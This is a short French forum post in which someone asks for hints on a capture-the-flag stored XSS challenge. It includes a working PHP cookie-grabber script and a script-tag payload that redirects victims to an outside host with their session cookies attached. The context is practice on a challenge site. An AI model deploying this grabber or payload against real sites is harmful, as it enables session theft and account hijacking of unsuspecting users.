Web - Client
Web - Client XSS - Stored 1
Bonjour ou bonsoir, j’aurais besoins d’aide sur le challenge XSS - Stored 1 de Web Client un indice une piste tout me serais favorable.
Voila le code de mon grabber.php :
<?php
if(isset($_GET['cookie']) && is_string($_GET['cookie']) && !empty($_GET['cookie']))
{
$referer = secure($_SERVER['HTTP_REFERER']);
$date = date('d-m-Y \à H\hi');
$data = "From : $referer\r\nDate : $date\r\n".htmlentities($_GET['cookie'])."\r\n------------------------------\r\n";
$handle = @fopen('cookies.txt','a');
fwrite($handle, $data);
fclose($handle);
$img = 'http://site.com/monimage.png';
$image = @imagecreatefrompng($img);
header('Content-Type: image/png');
@Imagepng($image);
@imagedestroy($image);
}
?>
et ensuite le code que je met dans le message sur le challenge c’est
<script language="Javascript"> location.replace("http://alliance-rain.tk/grabber.php?cookie="+document.cookie); </script>
Je comprend pas normalement en tapant dans ma barre de recherche" javascript:document.cookie " après avoir taper le code il est censé avoir marqué le cookie de l’admin mais rien ne ce passe
Cordialement